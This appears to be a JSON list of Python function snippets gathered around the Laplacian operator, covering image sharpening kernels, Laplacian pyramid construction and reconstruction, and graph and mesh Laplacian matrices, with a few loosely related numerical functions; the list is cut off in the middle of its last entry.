[ "def _laplacian_to_image(lpyr, filter_vec, coeff):\n im = lpyr[-1]\n filter_vec = filter_vec.reshape(filter_vec.size, 1)\n for i in reversed(range(len(lpyr) - 1)):\n im = _expand(im, filter_vec) + coeff[i] * lpyr[i]\n\n return im", "def lapsharp(image, maskret = False):\n #padded_image = np.pad(img, (1, 1), mode = 'symmetric')\n # lap is linear therefore;\n # lap f(x,y) = f(x + 1, y) + f(x - 1, y) + f(x, y + 1) + f(x, y - 1) - 4f(x,y)...\n #--------------------\n c = -1 # Depends on kernel\n # make zero kernal\n lapmask = np.zeros((3, 3))\n \n # add values to kernel\n lapmask[0,0] = 1\n lapmask[0,1] = 1\n lapmask[0,2] = 1\n\n lapmask[1,0] = 1\n lapmask[1,1] = -8\n lapmask[1,2] = 1\n\n lapmask[2,0] = 1\n lapmask[2,1] = 1\n lapmask[2,2] = 1\n #--------------------\n mask = convolve2d(image, lapmask, mode = 'same')\n result = image + c*mask\n\n # Map values to 0-255\n g1 = image - np.min(image)\n g = g1/np.max(g1) *255\n g = g.astype('uint8')\n\n if maskret == True:\n return g, mask\n else:\n return g.astype('uint8')", "def call(self, inputs, training=None):\n with tf.device(\"/device:GPU:0\"):\n return tf.reshape(tf.einsum('bj,jk,bk->b', inputs, self.laplacian, inputs), (-1, 1))", "def laplacian(self, array_in):\r\n\r\n # Call-through to Laplacian operator, already computed\r\n return self.laplace_op*array_in", "def laplacian_1d(window_size) -> torch.Tensor:\n\n filter_1d = torch.ones(window_size)\n filter_1d[window_size // 2] = 1 - window_size\n laplacian_1d: torch.Tensor = filter_1d\n return laplacian_1d", "def get_laplacian_kernel(kernel_size) -> torch.Tensor:\n kernel: torch.Tensor = get_laplacian_kernel2d(kernel_size)\n return kernel", "def _conv_laplace_3d(tensor):\n kernel = np.array([[[0., 0., 0.], [0., 1., 0.], [0., 0., 0.]],\n [[0., 1., 0.], [1., -6., 1.], [0., 1., 0.]],\n [[0., 0., 0.], [0., 1., 0.], [0., 0., 0.]]],\n dtype=np.float32)\n kernel = kernel.reshape((3, 3, 3, 1, 1))\n if tensor.shape[-1] == 1:\n return math.conv(tensor, kernel, padding='VALID')\n else:\n return math.concat([math.conv(tensor[..., i:i + 1], kernel, padding='VALID')\n for i in range(tensor.shape[-1])], -1)", "def lfilter(taps, array, filter_centre):\n arr = array.copy()\n left_pad_len = len(taps) - filter_centre - 1\n right_pad_len = filter_centre\n arr = np.concatenate(\n (array[1:1+left_pad_len][::-1], array,\n array[-right_pad_len-1:-1][::-1]))\n return np.convolve(arr, taps[::-1], 'valid')", "def sharp_laplace2(img):\n\n # the laplacian kernel\n laplace_kern = np.array([[-1., -1., -1.],\n [-1., 0., -1.],\n [-1., -1., -1.]])\n\n # See laplace 1 above for the following lines\n img = np.asarray(img, dtype=np.int)\n sharp = img + ndi.convolve(img, laplace_kern)\n\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def get_laplacian_kernel(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n window_1d: torch.Tensor = laplacian_1d(kernel_size)\n return window_1d", "def laplacian_smoothing(texture_data, lap, lap_b, nb_iter, dt):\n mod = 1\n if nb_iter > 10:\n mod = 10\n if nb_iter > 100:\n mod = 100\n if nb_iter > 1000:\n mod = 1000\n # print(tex.shape[0])\n # print(tex.ndim)\n # if tex.ndim < 2:\n # Mtex = tex.reshape(tex.shape[0],1)\n # else:\n # Mtex = tex\n # using Implicit scheme\n # B(X^(n+1)-X^n)/dt+L(X^(n+1))=0\n M = lap_b + dt * lap\n for i in range(nb_iter):\n texture_data = lap_b * texture_data\n if texture_data.ndim > 1:\n for d in range(texture_data.shape[1]):\n texture_data[:, d], infos = lgmres(\n M.tocsr(), texture_data[:, d], tol=solver_tolerance\n )\n else:\n texture_data, infos = lgmres(M.tocsr(), texture_data, tol=solver_tolerance)\n if i % mod == 0:\n print(i)\n\n # using Explicit scheme, convergence guaranteed only for dt<1 and not\n # faster than implicit when using fem Laplacian\n # B(X^(n+1)-X^n)/dt+L(X^n)=0\n # M = B-dt*L\n # for i in range(Niter):\n # Mtex = M * Mtex\n # Mtex, infos = lgmres(B.tocsr(), Mtex, tol=solver_tolerance)\n # if (i % mod == 0):\n # print(i)\n print(\" OK\")\n return texture_data", "def forward(self, x):\n x = torch.matmul(self.laplacian, x)\n dims = tuple(range(x.ndimension())[1:])\n x = x.pow(2).sum(dims)\n return x", "def uniform_laplacian(image, radius=1):\n height, width = image.shape[:2]\n window_size = 2 * radius + 1\n\n W = sparse_conv_matrix(width, height, np.ones((window_size, window_size)))\n\n return weights_to_laplacian(W)", "def sharp_laplace1(img):\n\n # Shapening the image with laplacian involves adding the image concolved\n # with the laplacian back to the original image. Since laplace operator\n # can generate negative values we need to use a int type image\n img = np.asarray(img, dtype=np.int)\n\n # Perform the operation\n sharp = img - ndi.laplace(img)\n\n # Clip, cast and return the result\n return np.asarray(np.clip(sharp, 0, 255), dtype=np.uint8)", "def uniform_laplacian_smoothing(vertices, faces):\n dtype = vertices.dtype\n num_vertices = vertices.shape[1]\n\n laplacian_matrix = uniform_laplacian(num_vertices, faces).to(dtype)\n smoothed_vertices = torch.matmul(laplacian_matrix, vertices) + vertices\n\n return smoothed_vertices", "def build_laplacian_nearest_neighbor_graph(\n input_vecs: types.Tensor, k: int = 1\n) -> types.Tensor:\n num_actions = tf.shape(input_vecs)[0]\n pdistance_matrix = compute_pairwise_distances(input_vecs)\n sorted_indices = tf.argsort(values=pdistance_matrix)\n selected_indices = tf.reshape(sorted_indices[:, 1 : k + 1], [-1, 1])\n rng = tf.tile(tf.expand_dims(tf.range(num_actions), axis=-1), [1, k])\n rng = tf.reshape(rng, [-1, 1])\n full_indices = tf.concat([rng, selected_indices], axis=1)\n adjacency_matrix = tf.zeros([num_actions, num_actions], dtype=tf.float32)\n adjacency_matrix = tf.tensor_scatter_nd_update(\n tensor=adjacency_matrix,\n indices=full_indices,\n updates=tf.ones([k * num_actions], dtype=tf.float32),\n )\n # Symmetrize it.\n adjacency_matrix = adjacency_matrix + tf.transpose(adjacency_matrix)\n adjacency_matrix = tf.minimum(\n adjacency_matrix, tf.ones_like(adjacency_matrix)\n )\n degree_matrix = tf.linalg.tensor_diag(tf.reduce_sum(adjacency_matrix, axis=1))\n laplacian_matrix = degree_matrix - adjacency_matrix\n return laplacian_matrix", "def laplacian_to_image(lpyr, filter_vec, coeff):\n #TODO check size\n size_list = len(lpyr)\n for i in range(size_list):\n lpyr[i] *= coeff[i]\n\n resIm = lpyr[size_list-1]\n for i in range(size_list- 1,0,-1):\n resIm = expand_im(resIm,filter_vec)\n resIm += lpyr[i-1]\n\n return resIm", "def build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = gaus_1d(filter_size).reshape(1, filter_size)\n g_pyr = build_gaussian_pyramid(im, max_levels, filter_size)[0]\n l_pyr = []\n for i in range(len(g_pyr) - 1):\n l_im = g_pyr[i] - expand_im(g_pyr[i + 1], filter_vec)\n l_pyr.append(l_im)\n\n l_pyr.append(g_pyr[-1])\n return [l_pyr, filter_vec]", "def _laplacian(tangent_vec):\n to_squeeze = False\n if tangent_vec.ndim == 2:\n tangent_vec = gs.expand_dims(tangent_vec, axis=0)\n to_squeeze = True\n n_tangent_vecs = len(tangent_vec)\n tangent_vec_diff = (\n tangent_vec[:, id_vertices[0]] - tangent_vec[:, id_vertices[1]]\n )\n values = gs.einsum(\n \"bd,nbd->nbd\", gs.stack([gs.flatten(cot)] * 3, axis=1), tangent_vec_diff\n )\n\n laplacian_at_tangent_vec = gs.zeros((n_tangent_vecs, n_vertices, 3))\n\n id_vertices_201_repeated = gs.tile(id_vertices[1, :], (n_tangent_vecs, 1))\n\n for i_dim in range(3):\n laplacian_at_tangent_vec[:, :, i_dim] = gs.scatter_add(\n input=laplacian_at_tangent_vec[:, :, i_dim],\n dim=1,\n index=id_vertices_201_repeated,\n src=values[:, :, i_dim],\n )\n return (\n gs.squeeze(laplacian_at_tangent_vec, axis=0)\n if to_squeeze\n else laplacian_at_tangent_vec\n )", "def lanczos(dx, width, cutoff, /):\n # Coefficients and initial stuff\n # n = (width/dx)//1 # convert window width from 'time units' to 'steps'\n # n = width//2\n # Convert alpha to wavenumber (new units are 'inverse timesteps')\n alpha = 1.0 / (cutoff / dx)\n n = width\n n = (n - 1) // 2 + 1\n tau = np.arange(1, n + 1) # lag time\n C0 = 2 * alpha # integral of cutoff-response function is alpha*pi/pi\n Ck = np.sin(2 * np.pi * alpha * tau) / (np.pi * tau)\n Cktilde = Ck * np.sin(np.pi * tau / n) / (np.pi * tau / n)\n\n # Return filter\n # Example: n = 9 returns 4 + 4 + 1 points\n order = n * 2 - 1\n print(f'Order-{order} Lanczos window')\n window = np.concatenate((np.flipud(Cktilde), np.array([C0]), Cktilde))\n return window[1:-1], 1", "def build_laplacian_over_ordinal_integer_actions(\n action_spec: types.BoundedTensorSpec,\n) -> types.Tensor:\n num_actions = policy_utilities.get_num_actions_from_tensor_spec(action_spec)\n adjacency_matrix = np.zeros([num_actions, num_actions])\n for i in range(num_actions - 1):\n adjacency_matrix[i, i + 1] = 1.0\n adjacency_matrix[i + 1, i] = 1.0\n laplacian_matrix = (\n np.diag(np.sum(adjacency_matrix, axis=0)) - adjacency_matrix\n )\n return laplacian_matrix", "def _build_laplacian_pyramid(im, max_levels, filter_size):\n filter_vec = _gaussian_kernel_1d(filter_size).reshape(filter_size, 1)\n pyr = []\n im_curr = im\n im_next = _reduce(im, filter_vec)\n while _image_is_large_enough(im_next) and len(pyr) < max_levels - 1:\n pyr.append(im_curr - _expand(im_next, filter_vec))\n im_curr = im_next\n im_next = _reduce(im_curr, filter_vec)\n\n pyr.append(im_curr)\n\n return pyr, filter_vec.reshape(1, filter_size)", "def _laplacian_pyramid(batch, num_levels):\n gaussian_filter = constant_op.constant(_GAUSSIAN_FILTER)\n\n def spatial_conv(batch, gain):\n s = array_ops.shape(batch)\n padded = array_ops.pad(batch, [[0, 0], [2, 2], [2, 2], [0, 0]], 'REFLECT')\n xt = array_ops.transpose(padded, [0, 3, 1, 2])\n xt = array_ops.reshape(xt, [s[0] * s[3], s[1] + 4, s[2] + 4, 1])\n conv_out = nn_ops.conv2d(xt, gaussian_filter * gain, [1] * 4, 'VALID')\n conv_xt = array_ops.reshape(conv_out, [s[0], s[3], s[1], s[2]])\n conv_xt = array_ops.transpose(conv_xt, [0, 2, 3, 1])\n return conv_xt\n\n def pyr_down(batch): # matches cv2.pyrDown()\n return spatial_conv(batch, 1)[:, ::2, ::2]\n\n def pyr_up(batch): # matches cv2.pyrUp()\n s = array_ops.shape(batch)\n zeros = array_ops.zeros([3 * s[0], s[1], s[2], s[3]])\n res = array_ops.concat([batch, zeros], 0)\n res = array_ops.batch_to_space(res, crops=[[0, 0], [0, 0]], block_size=2)\n res = spatial_conv(res, 4)\n return res\n\n pyramid = [math_ops.to_float(batch)]\n for _ in range(1, num_levels):\n pyramid.append(pyr_down(pyramid[-1]))\n pyramid[-2] -= pyr_up(pyramid[-1])\n return pyramid", "def apply_laplacian(src, size):\n ddepth = cv2.CV_16S\n src = cv2.GaussianBlur(src, (size, size), 0)\n # src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n dst = cv2.Laplacian(src, ddepth, ksize=size)\n abs_dst = cv2.convertScaleAbs(dst)\n return abs_dst", "def get_laplacian_kernel2d(kernel_size: int) -> torch.Tensor:\n if not isinstance(kernel_size, int) or kernel_size % 2 == 0 or \\\n kernel_size <= 0:\n raise TypeError(\"ksize must be an odd positive integer. Got {}\"\n .format(kernel_size))\n\n kernel = torch.ones((kernel_size, kernel_size))\n mid = kernel_size // 2\n kernel[mid, mid] = 1 - kernel_size ** 2\n kernel_2d: torch.Tensor = kernel\n return kernel_2d", "def LaplacianMatrix(adjmatrix):\n if adjmatrix.dtype in [np.uint, np.uint0, np.uint8, np.uint16, np.uint32, np.uint64]:\n adjmatrix = adjmatrix.astype(int)\n N = len(adjmatrix)\n\n laplacianmatrix = np.identity(N, dtype=adjmatrix.dtype) * adjmatrix.sum(axis=1)\n laplacianmatrix -= adjmatrix\n\n return laplacianmatrix", "def prepare_laplacian(laplacian):\n\n def estimate_lmax(laplacian, tol=5e-3):\n r\"\"\"Estimate the largest eigenvalue of an operator.\"\"\"\n lmax = sparse.linalg.eigsh(laplacian, k=1, tol=tol,\n ncv=min(laplacian.shape[0], 10),\n return_eigenvectors=False)\n lmax = lmax[0]\n lmax *= 1 + 2 * tol # Be robust to errors.\n return lmax\n\n def scale_operator(L, lmax, scale=1):\n r\"\"\"Scale the eigenvalues from [0, lmax] to [-scale, scale].\"\"\"\n I = sparse.identity(L.shape[0], format=L.format, dtype=L.dtype)\n L *= 2 * scale / lmax\n L -= I\n return L\n\n lmax = estimate_lmax(laplacian)\n laplacian = scale_operator(laplacian, lmax)\n\n laplacian = sparse.coo_matrix(laplacian)\n\n # PyTorch wants a LongTensor (int64) as indices (it'll otherwise convert).\n indices = np.empty((2, laplacian.nnz), dtype=np.int64)\n np.stack((laplacian.row, laplacian.col), axis=0, out=indices)\n indices = torch.from_numpy(indices)\n\n laplacian = torch.sparse_coo_tensor(indices, laplacian.data, laplacian.shape)\n laplacian = laplacian.coalesce() # More efficient subsequent operations.\n return laplacian", "def laplace(tensor, padding='replicate', axes=None, use_fft_for_periodic=False):\n rank = spatial_rank(tensor)\n if padding is None or padding == 'valid':\n pass # do not pad tensor\n elif padding in ('circular', 'wrap') and use_fft_for_periodic:\n return fourier_laplace(tensor)\n else:\n tensor = math.pad(tensor, _get_pad_width_axes(rank, axes, val_true=[1, 1], val_false=[0, 0]), padding)\n # --- convolutional laplace ---\n if axes is not None:\n return _sliced_laplace_nd(tensor, axes)\n if rank == 2:\n return _conv_laplace_2d(tensor)\n elif rank == 3:\n return _conv_laplace_3d(tensor)\n else:\n return _sliced_laplace_nd(tensor)", "def generate_graph_laplacian(A):\r\n\r\n #Create symmetric matrix\r\n #A=0.5* (A+ A.T)\r\n \r\n #D is just the identity matrix (because sum(P)=1)\r\n Degree=np.sum(A,1)\r\n D=np.diag(Degree)\r\n \r\n #Laplacian matrix\r\n L=D-A\r\n return L", "def build_laplacian_pyramid(im, max_levels, filter_size):\n pyr = []\n org_reduce, filter_vec = build_gaussian_pyramid(im, max_levels, filter_size)\n for i in range(max_levels - 1):\n temp_expand = expand(org_reduce[i + 1], filter_vec)\n org_layer = org_reduce[i]\n temp = org_layer - temp_expand\n pyr.append(temp)\n # plt.imshow(org_reduce[-1], cmap='gray')\n # plt.show()\n pyr.append(org_reduce[-1])\n return pyr, filter_vec", "def lfilter(size, b, a, x, *args, **kwargs):\n\n sym_a = is_theano_object(a)\n sym_b = is_theano_object(b)\n sym_x = is_theano_object(x)\n\n M, N = size\n if sym_b or sym_x:\n s = x * b[0]\n for tau in range(1, M):\n u = x[:-tau] * b[tau]\n s = T.inc_subtensor(s[tau:], u)\n else:\n s = scipy.signal.lfilter(b, a, x, *args, **kwargs)\n return s", "def compute_mesh_laplacian(mesh, weights=None, fem_b=None, lap_type=\"conformal\"):\n print(\" Computing Laplacian\")\n if weights is None:\n (weights, fem_b) = compute_mesh_weights(mesh, weight_type=lap_type)\n\n if lap_type == \"fem\":\n weights.data = weights.data / 2\n\n N = weights.shape[0]\n sB = fem_b.sum(axis=0)\n diaB = sparse.dia_matrix((sB, 0), shape=(N, N))\n B = sparse.lil_matrix(diaB + fem_b)\n s = weights.sum(axis=0)\n dia = sparse.dia_matrix((s, 0), shape=(N, N))\n L = sparse.lil_matrix(dia - weights)\n\n # if symmetrize == 1 & & normalize == 0\n # L = diag(sum(W, 2)) - W;\n # elseif\n # symmetrize == 1 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1 / 2)) * W * diag(\n # sum(W, 2). ^ (-1 / 2));\n # elseif\n # symmetrize == 0 & & normalize == 1\n # L = speye(n) - diag(sum(W, 2). ^ (-1)) * W;\n\n li = np.hstack(L.data)\n print(\" -nb Nan in Laplacian : \", len(np.where(np.isnan(li))[0]))\n print(\" -nb Inf in Laplacian : \", len(np.where(np.isinf(li))[0]))\n\n return L, B", "def laplacianEdgeDetector(img):\n laplacian_kernel = np.array([[0,1,0],\\\n [1,-4,1],\\\n [0,1,0]])\n return convolve2d(img, laplacian_kernel, mode='same')", "def rebuild_the_laplacians():\n local_matrix = InteractomeInterface()\n local_matrix.full_rebuild()\n\n annot_matrix = AnnotomeInterface()\n annot_matrix.full_rebuild()", "def _sliced_laplace_nd(tensor, axes=None):\n rank = spatial_rank(tensor)\n dims = range(rank)\n components = []\n for ax in dims:\n if _contains_axis(axes, ax, rank):\n lower, center, upper = _dim_shifted(tensor, ax, (-1, 0, 1), diminish_others=(1, 1), diminish_other_condition=lambda other_ax: _contains_axis(axes, other_ax, rank))\n components.append(upper + lower - 2 * center)\n return math.sum(components, 0)", "def Naive_forwardpass(self):\n\n for filter_k in range(0, self.n_filters):\n filter_col = self.im2col(self.filter_map[filter_k].data_mtx)\n for hgt_indx in range(0, self.Output_Height):\n for wdth_indx in range(0, self.Output_Width):\n wdth_start_index = wdth_indx * self.stride_len\n wdth_end_index= wdth_start_index + self.filter_size\n hgt_start_index = hgt_indx * self.stride_len\n hgt_end_index = hgt_start_index + self.filter_size\n trn_img_area = self.input_vol.padded_mtx[:, wdth_start_index:wdth_end_index,\n hgt_start_index:hgt_end_index]\n trn_img_col = self.im2col(trn_img_area)\n self.output_Tensor.data_mtx[filter_k,wdth_indx , hgt_indx] = self.convolution_op(trn_img_col,\n filter_col) + np.sum(self.bias_vol[filter_k].data_mtx)\n return self.output_Tensor", "def apply(self, mode='lateral'):\n num_lat_slices = self.img3d.shape[0]\n num_cor_slices = self.img3d.shape[2]\n bin_mask = np.zeros(self.mask3d.shape)\n x,y,z = np.where(self.mask3d==self.vertebra_id)\n bin_mask[np.min(x):np.max(x), np.min(y):np.max(y), np.min(z):np.max(z)] = 1\n if mode=='lateral' or mode=='fuse':\n mask_lat = np.zeros((6, self.mask3d.shape[0], self.mask3d.shape[1], self.mask3d.shape[2]))\n img_lat = np.zeros(self.img3d.shape)\n binary_lat = np.zeros(self.mask3d.shape)\n # for each lateral slice\n for idx in range(num_lat_slices):\n img_slice, mask_slice = np.copy(self.img3d[idx, :, :]), np.copy(self.mask3d[idx, :, :])\n xloc, yloc = np.where(mask_slice==self.vertebra_id)\n # check if vertebra is present in image\n if xloc.shape[0]==0:\n # if not keep mask as it is\n mask_lat[:,idx, :, :] = self.get_one_hot(mask_slice)\n img_lat[idx, :, :] = img_slice\n else:\n min_x, max_x = np.min(xloc), np.max(xloc)\n min_y, max_y = np.min(yloc), np.max(yloc)\n inpainted_img, inpainted_mask, binary_mask = self.inpaint(img_slice, mask_slice, min_x, max_x, min_y, max_y)\n mask_lat[:,idx, :, :] = inpainted_mask\n img_lat[idx,:, :] = inpainted_img\n binary_lat[idx,:,:] = binary_mask\n\n\n if mode=='coronal' or mode=='fuse':\n mask_cor = np.zeros((6, self.mask3d.shape[0], self.mask3d.shape[1], self.mask3d.shape[2]))\n img_cor = np.zeros(self.img3d.shape)\n binary_cor = np.zeros(self.mask3d.shape)\n # for each coronal slice\n for idx in range(num_cor_slices):\n img_slice, mask_slice = np.copy(self.img3d[:, :, idx]), np.copy(self.mask3d[:, :, idx])\n xloc, yloc = np.where(mask_slice==self.vertebra_id)\n # check if vertebra is present in image\n if xloc.shape[0]==0:\n # if not keep mask as it is\n mask_cor[:, :, :, idx] = self.get_one_hot(mask_slice)\n img_cor[:, :, idx] = img_slice\n else:\n min_x, max_x = np.min(xloc), np.max(xloc)\n min_y, max_y = np.min(yloc), np.max(yloc)\n # else remove fractured vertebra and inpaint\n inpainted_img, inpainted_mask, binary_mask = self.inpaint(img_slice, mask_slice, min_x, max_x, min_y, max_y, 'coronal')\n mask_cor[:, :, :, idx] = inpainted_mask\n img_cor[:, :, idx] = inpainted_img\n binary_cor[:,:,idx] = binary_mask\n \n # return to a one channel mask and convert labels back\n if mode=='lateral':\n mask_lat = np.argmax(mask_lat, axis=0)\n mask_lat = self.map_class_to_vert(mask_lat)\n self.mask3d = mask_lat\n self.img3d = img_lat\n elif mode=='coronal':\n mask_cor = np.argmax(mask_cor, axis=0)\n mask_cor = self.map_class_to_vert(mask_cor)\n self.mask3d = mask_cor\n self.img3d = img_cor\n elif mode=='fuse':\n mask_fuse = mask_cor*0.5+mask_lat*0.5\n mask_fuse = np.argmax(mask_fuse, axis=0)\n mask_fuse = self.map_class_to_vert(mask_fuse)\n self.mask3d = mask_fuse\n self.img3d = (img_lat+img_cor)/2\n \n # save result\n self.mask3d = self.mask3d.astype(np.uint8)\n self.img3d = self.img3d.astype(np.float32)\n \n # put back if we padded and cropped\n if self.padz and self.padx:\n self.orig_img3d[:,self.ymin:self.ymax, :] = self.img3d[self.xcrop1:-self.xcrop2,:,self.zcrop1:-self.zcrop2]\n self.orig_mask3d[:,self.ymin:self.ymax, :] = self.mask3d[self.xcrop1:-self.xcrop2,:,self.zcrop1:-self.zcrop2]\n elif self.padz and not self.padx:\n self.orig_img3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, :] = self.img3d[:,:,self.zcrop1:-self.zcrop2]\n self.orig_mask3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, :] = self.mask3d[:,:,self.zcrop1:-self.zcrop2]\n elif not self.padz and self.padx:\n self.orig_img3d[:,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.img3d[self.xcrop1:-self.xcrop2,:,:]\n self.orig_mask3d[:,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.mask3d[self.xcrop1:-self.xcrop2,:,:]\n else:\n self.orig_img3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.img3d\n self.orig_mask3d[self.xcrop1:self.xcrop2,self.ymin:self.ymax, self.zcrop1:self.zcrop2] = self.mask3d\n \n img = return_scan_to_orig(self.orig_img3d, self.mask_affine, self.mask_header, self.zooms)\n nib.save(img, self.inpainted_img_path)\n\n mask_fuse = return_scan_to_orig(self.orig_mask3d, self.mask_affine, self.mask_header, self.zooms, np.uint8)\n nib.save(mask_fuse, self.inpainted_mask_path)\n print('Inpaint mask and image saved at: ', self.inpainted_mask_path, self.inpainted_img_path)", "def buildLaplacianPyramid(imgIn, maxLevel): \n currentLayer=0\n imgPyramid = []\n curSrc = imgIn.astype(np.float32)\n while(currentLayer<maxLevel-1):\n curH, curW = curSrc.shape[0:2]\n if curH < 4 or curW < 4:\n break\n currentLayer+=1 \n imgBlur=cv2.GaussianBlur(curSrc, ksize=(0, 0), sigmaX=3)\n imgBlurDown=cv2.resize(imgBlur, ((curW+1)//2, (curH+1)//2))\n imgBlurUp = cv2.resize(imgBlurDown, (curW, curH))\n imgBlurUp = cv2.GaussianBlur(imgBlurUp, ksize=(0, 0), sigmaX=3)\n imgDiff=curSrc-imgBlurUp\n imgPyramid.append(imgDiff)\n curSrc = imgBlurDown\n\n imgPyramid.append(curSrc)\n return imgPyramid", "def ft_inv_laplace(a, fcc=False):\n k_sq = 1.0\n for i in range(a.shape[0]):\n for j in range(a.shape[1]):\n for l in range(a.shape[2]):\n if (i == 0) and (j == 0) and (l == 0):\n a[i,j,l] = 0\n continue\n if i > a.shape[0]/2:\n i = a.shape[0] + 1 - i\n if j > a.shape[0]/2:\n j = a.shape[0] + 1 - j\n if l > a.shape[0]/2:\n l = a.shape[0] + 1 - l\n if fcc:\n k_sq = 1.5*(i**2 + j**2 + l**2) - i*j - j*l - i*l\n else:\n k_sq = i**2 + j**2 + l**2\n a[i,j,l] = a[i,j,l]/(k_sq)", "def forward(self, A: Tensor, L: Tensor, T: int) -> Tensor:\n\n A = A.squeeze().permute(1, 0) # [K x C]\n L = L.squeeze() # [K]\n L_prime = project_lengths_softmax(T=T, L=L)\n K = A.shape[0]\n C = A.shape[1]\n l_max = int(L_prime.max() + 0.5) # round to the nearest int\n pis = torch.zeros_like(L_prime) # [K]\n\n normalized_l = self._normalize_scale(l_max, L_prime)\n normalized_p = self._normalize_location(l_max, pis, L_prime)\n\n params_mat = self._create_params_matrix(normalized_l, normalized_p) # [K x 3]\n theta = self._create_theta(params_mat) # [K x 2 x 3]\n\n grid = F.affine_grid(theta, torch.Size((K, C, 1, l_max)))\n\n temp_A = A.view(K, C, 1, 1).expand(-1, -1, -1, self.temp_width)\n upsampled_probs = F.grid_sample(temp_A, grid, mode=\"bilinear\")\n upsampled_probs = upsampled_probs.view(K, C, l_max) # [K x C x l_max]\n upsampled_cropped = []\n for i, prob in enumerate(upsampled_probs):\n prob_cropped = prob[:, 0 : round(L_prime[i].item())]\n upsampled_cropped.append(prob_cropped)\n\n out = torch.cat(upsampled_cropped, dim=1).unsqueeze(dim=0) # [1 x C x ~T]\n out = F.interpolate(input=out, size=T) # [1 x C x T]\n return out # [1 x C x T]", "def lap_split(img):\n\n with tf.name_scope('split'):\n lo = tf.nn.conv2d(img, k5x5, [1, 2, 2, 1], 'SAME')\n lo2 = tf.nn.conv2d_transpose(lo, k5x5*4, tf.shape(img), [1, 2, 2, 1])\n hi = img-lo2\n\n return lo, hi", "def _get_Laplacian_matrix(self, X):\n self.laplacian_mat, self.laplacian_sym_mat, self.laplacian_weights = self.laplacian.compute_laplacian(\n self.get_Affinity_matrix(X)\n )", "def laplaceianReduce(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gaker = cv2.getGaussianKernel(5, -1)\r\n upsmaple_kernel = gaker @ gaker.transpose()\r\n upsmaple_kernel *= 4\r\n gau_pyr = gaussianPyr(img, levels)\r\n gau_pyr.reverse()\r\n lap_pyr = [gau_pyr[0]]\r\n for i in range(1, len(gau_pyr)):\r\n expanded = gaussExpand(gau_pyr[i-1], upsmaple_kernel)\r\n if gau_pyr[i].shape != expanded.shape:\r\n x = expanded.shape[0] - gau_pyr[i].shape[0]\r\n y = expanded.shape[1] - gau_pyr[i].shape[1]\r\n expanded = expanded[x::, y::]\r\n diff_img = gau_pyr[i] - expanded\r\n else:\r\n diff_img = gau_pyr[i] - expanded\r\n lap_pyr.append(diff_img)\r\n\r\n lap_pyr.reverse()\r\n return lap_pyr", "def nodalLaplacian(self):\n if getattr(self, '_nodalLaplacian', None) is None:\n print('Warning: Laplacian has not been tested rigorously.')\n # The number of cell centers in each direction\n n = self.vnC\n # Compute divergence operator on faces\n if(self.dim == 1):\n D1 = sdiag(1./self.hx) * ddx(self.nCx)\n L = - D1.T*D1\n elif(self.dim == 2):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n L1 = sp.kron(speye(n[1]+1), - D1.T * D1)\n L2 = sp.kron(- D2.T * D2, speye(n[0]+1))\n L = L1 + L2\n elif(self.dim == 3):\n D1 = sdiag(1./self.hx) * ddx(n[0])\n D2 = sdiag(1./self.hy) * ddx(n[1])\n D3 = sdiag(1./self.hz) * ddx(n[2])\n L1 = kron3(speye(n[2]+1), speye(n[1]+1), - D1.T * D1)\n L2 = kron3(speye(n[2]+1), - D2.T * D2, speye(n[0]+1))\n L3 = kron3(- D3.T * D3, speye(n[1]+1), speye(n[0]+1))\n L = L1 + L2 + L3\n self._nodalLaplacian = L\n return self._nodalLaplacian", "def reconstructFromLaplacianPyramid(pyramid):\n \n nLevels = len(pyramid)\n out = pyramid[-1]\n if len(pyramid) == 1:\n return out\n\n useStack = False\n if pyramid[0].shape[0:2] == pyramid[-1].shape[0:2]:\n useStack = True\n\n dtp = out.dtype\n for i in range(nLevels-2,-1,-1):\n newSz = pyramid[i].shape[0:2]\n if useStack:\n up = out\n else:\n up = cv2.pyrUp(out,dstsize=(newSz[1],newSz[0]))\n if len(up.shape) < 3:\n up.shape += (1,)\n out = up + pyramid[i]\n out = out.astype(dtp)\n\n return out", "def lap2D(self, lat):\n lap = np.roll(lat, 1, 0) + np.roll(lat, -1, 0) + \\\n np.roll(lat, 1, 1) + np.roll(lat, -1, 1) - \\\n 4. * lat\n lap = 1./self.dx**2. * lap\n # print(lap[50][50])\n return(lap)", "def get_laplacian(adjacency: sparse.csr_matrix) -> sparse.csr_matrix:\n weights = adjacency.dot(np.ones(adjacency.shape[0]))\n return sparse.diags(weights) - adjacency", "def clConvolution(self, size, mask):", "def laplace_filter(F, M=None):\n\n if not M:\n M = np.ones_like(F)\n\n return 0.5 * (laplace_X(laplace_Y(F, M), M) +\n laplace_Y(laplace_X(F, M), M))", "def l_up(self, filters, l_in, l_c):\n l = tf.keras.layers.UpSampling2D(self.pooling_size)(l_in)\n l = tf.keras.layers.Conv2D(filters, 2, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n l = tf.keras.layers.concatenate([l_c, l], axis=3)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n l = tf.keras.layers.Conv2D(filters, 3, activation='relu', padding='same', kernel_initializer='he_normal')(l)\n\n return l", "def laplacian(W, normalized=True):\n\n # Degree matrix.\n d = W.sum(dim=0)\n\n # Laplacian matrix.\n if not normalized:\n D = scipy.sparse.diags(d.A.squeeze(), 0)\n L = D - W\n else:\n # d += np.spacing(np.array(0, W.dtype))\n d = 1 / torch.sqrt(d)\n D = torch.diags(d.A.squeeze(), 0)\n I = scipy.sparse.identity(d.size, dtype=W.dtype)\n L = I - D * W * D\n\n # assert np.abs(L - L.T).mean() < 1e-9\n assert type(L) is scipy.sparse.csr.csr_matrix\n return L", "def buildLaplacianPyramid(guassianPyramid):\n pyramid = []\n for i in 